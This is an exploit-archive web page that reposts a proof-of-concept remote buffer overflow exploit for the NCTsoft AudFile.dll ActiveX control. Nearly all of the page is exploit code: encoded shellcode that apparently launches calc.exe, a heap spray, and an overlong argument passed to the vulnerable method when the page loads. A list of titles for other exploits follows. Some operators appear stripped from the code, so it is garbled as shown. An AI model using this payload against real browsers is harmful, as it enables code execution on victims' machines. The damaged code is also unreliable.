NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

所属分类：网络安全 / Exploit 阅读数： 141

收藏 0赞 0分享

-----------------------------------------------------------------------------
NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow
url: http://www.nctsoft.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
-----------------------------------------------------------------------------
<html>
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 5200;
var x = unescape("");
while (x.length<buffSize) x = x;
x = x.substring(0,buffSize);
boom.SetFormatLikeSample (x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide = sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize sizeHDM);
var heapBlocks = (heapSA heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i )
{
memory[i] = sSlide sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" codebase="http://shinnai.net/AudFile.dll">
Unable to create object
</object>
</body>
</html>

更多精彩内容其他人还在看

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

MyBulletinBoard (MyBB)

网络赚钱

站长故事